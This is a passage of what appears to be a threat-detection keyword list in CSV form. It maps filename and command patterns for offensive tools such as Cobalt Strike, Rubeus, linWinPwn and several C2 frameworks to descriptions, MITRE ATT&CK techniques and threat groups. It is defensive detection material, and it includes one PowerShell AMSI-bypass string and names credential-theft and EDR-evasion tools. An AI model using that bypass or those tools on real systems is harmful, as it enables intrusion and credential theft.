- T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*artifact64.dll*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*artifact64.exe*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*artifact64.x64.dll*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*artifact64big.exe*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*artifact64big.x64.dll*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*artifact64svc.exe*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*artifact64svcbig.exe*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*artifactbig64.exe*","offensive_tool_keyword","cobaltstrike","default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*artifactuac*.dll*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*aruba2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*AS 'Login that can be impersonated'*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" +"*as 'Owner that can be impersonated'*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" +"*ASBBypass.ps1*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*ASBBypass.ps1*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" +"*ASBBypass.ps1*","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z" +"*ASRenum-BOF.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules. actions. and exclusion locations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mlcsec/ASRenum-BOF","1","1","N/A","10","10","121","15","2022-12-28T17:27:18Z","2022-12-28T14:41:02Z" +"*asrep_attack*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*asrep2kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*asreprc4_attack*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*asreproast /*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Asreproast.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*ASREPRoast.ps1*","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. ","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","1","N/A","N/A","2","180","57","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z" +"*asreproast_*.txt*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*asreproast_john_results_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*asreproast_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*ASreproasting.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*ASRepToHashcat*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*Assemblies/SharpMove.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","616","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" +"*assembly *.asm *","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*assembly *.exe *","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed'*'NonPublic*Static').SetValue($null*$true)*","offensive_tool_keyword","AD exploitation cheat sheet","PowerShell AMSI Bypass","T1548 T1562 T1027","N/A","N/A","N/A","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*assembly_inject -*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*--assemblyargs AntiVirus AppLocker*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*Assets/solution/dllmain.cpp*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","1","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" +"*AssmblyLoader*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*assoc *findstr *=cm*","greyware_tool_keyword","assoc","will return the file association for file extensions that include the string =cm - hidden objectif is to find .cdxml association","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*assoc *findstr *lCmd*","greyware_tool_keyword","assoc","will return the file association for file extensions that include the string lCmd - hidden objectif is to find .cdxml association","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*assoc *findstr *mdf*","greyware_tool_keyword","assoc","will return the file association for file extensions that include the string mdf - hidden objectif is to find cmdfile association","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*assoc *findstr *s1x*","greyware_tool_keyword","assoc","will return the file association for file extensions that include the string s1x - hidden objectif is to find .ps1xml association","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*assoc *findstr =cm*","greyware_tool_keyword","assoc","will return the file association for file extensions that include the string =cm - hidden objectif is to find .cdxml association","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*assoc *findstr lCmd*","greyware_tool_keyword","assoc","will return the file association for file extensions that include the string lCmd - hidden objectif is to find .cdxml association","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*assoc *findstr mdf*","greyware_tool_keyword","assoc","will return the file association for file extensions that include the string mdf - hidden objectif is to find cmdfile association","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*assoc *findstr s1x*","greyware_tool_keyword","assoc","will return the file association for file extensions that include the string s1x - hidden objectif is to find .ps1xml association","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*AsStrongAsFuck.exe*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*AsStrongAsFuck.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*async_webshell-all.py*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*AsyncRAT/DCRat*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*asyncssh_commander.py *","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - 